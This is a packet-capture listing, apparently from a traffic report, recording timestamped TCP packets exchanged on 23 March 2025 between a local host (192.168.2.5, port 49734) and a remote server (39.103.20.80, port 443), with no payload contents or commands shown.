Mar 23, 2025 03:15:53.234811068 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.239460945 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.239523888 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.241138935 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.241202116 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.245398045 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.245452881 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.246983051 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.247037888 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.247538090 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.247589111 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.249336958 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.249397993 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.252077103 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.252139091 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.254769087 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.254832029 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.257019997 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.257080078 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.260500908 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.260562897 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.262178898 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.262233019 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.263868093 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.263917923 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.265676975 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.265738010 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.268557072 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.268616915 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.270656109 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.270714045 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.273420095 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.273475885 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.275172949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.275268078 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.278541088 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.278599977 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.280225039 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.280278921 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.283086061 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.283144951 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.284153938 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.284214973 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.287024975 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.287086010 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.289129972 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.289200068 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.289891005 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.289951086 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.293144941 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.293210030 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.295113087 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.295186996 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700246096 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700282097 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700314999 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700436115 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700436115 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700436115 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700474977 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700508118 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700544119 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700555086 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700577021 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700589895 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700598001 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700637102 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700649023 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700683117 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700690985 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700710058 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700726032 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700730085 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700745106 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700762033 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700774908 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700792074 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700793028 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700792074 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700819969 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700826883 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700835943 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700843096 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700858116 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700877905 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700881004 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700894117 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700906038 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700911999 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700917959 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700936079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700942039 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700953960 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700961113 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700979948 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.700984001 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.700992107 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701006889 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701010942 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701035976 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701045036 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701052904 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701056957 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701076031 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701100111 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701111078 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701123953 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701124907 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701153040 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701153994 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701164961 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701176882 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701195002 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701211929 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701220989 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701231003 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701232910 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701260090 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701262951 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701272011 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701282978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701297045 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701314926 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701323986 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701339960 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701342106 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701369047 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701371908 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701380968 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701392889 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701404095 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701426029 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701428890 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701438904 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701445103 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701466084 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701478958 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701486111 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701500893 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701512098 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701528072 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701529026 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701539040 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701554060 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701565027 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701584101 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701594114 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701608896 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701612949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701633930 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701642036 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701658010 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701658964 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701684952 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701689005 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701699018 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701710939 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701724052 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701739073 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701749086 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701759100 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701766014 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701787949 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701787949 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701800108 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701813936 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701827049 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701844931 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701853991 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701868057 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701869011 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701895952 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701910973 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701919079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701920033 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701946974 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701956987 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.701963902 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701977015 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.701992035 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702004910 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702004910 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702018023 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702029943 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702048063 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702053070 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702064037 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702073097 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702084064 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702107906 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702107906 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702131987 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702138901 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702147961 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702171087 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702178001 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702195883 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702204943 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702204943 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702214956 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702229977 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702244997 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702258110 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702264071 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702274084 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702275991 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702301979 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702305079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702320099 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702332020 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702332973 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702343941 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702358007 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702367067 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702379942 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702379942 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702408075 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702414989 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702423096 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702435017 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702439070 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702466965 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702469110 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702478886 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702481985 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702505112 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702516079 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702524900 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702538013 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702553034 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702565908 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702568054 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702578068 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702600002 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702610016 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.702625036 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.702653885 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.714467049 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.714476109 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.714514017 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.714622021 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.714760065 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.714760065 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.714793921 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.714822054 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.714994907 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715008020 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715038061 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715045929 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715085983 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715123892 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715133905 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715152979 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715161085 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715179920 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715193033 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715202093 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715219975 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715223074 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715224028 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715250969 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715257883 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.715270996 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.715297937 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:53.920320988 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:53.920418978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.128318071 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.128393888 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.296850920 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.296917915 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.296963930 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.296999931 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297090054 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297112942 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297171116 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297229052 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297229052 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297265053 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297278881 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297348976 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297364950 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297451973 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297463894 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.297491074 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297535896 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.297630072 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358241081 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358267069 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358304024 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358349085 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358388901 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358432055 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358526945 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358544111 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358602047 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358619928 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.358700991 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.358752012 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.564333916 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.564399958 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:54.984359026 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:54.984556913 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.179795027 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.179831028 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.179861069 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.179905891 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.179922104 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.179977894 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.179991961 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180016994 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180041075 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180056095 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180079937 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180109978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180109978 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180128098 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180161953 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180176020 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180233955 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180233955 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180253029 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180284977 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180326939 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180339098 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180416107 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180416107 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180430889 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180530071 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180542946 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180608988 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180619001 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.180689096 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.180689096 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.388369083 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.389312029 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:55.816333055 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:55.816652060 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:56.160849094 CET	49734	443	192.168.2.5	39.103.20.80
Mar 23, 2025 03:15:56.160914898 CET	443	49734	39.103.20.80	192.168.2.5
Mar 23, 2025 03:15:56.160952091 CET	443	49734	39.103.20.80	192.168.2.5
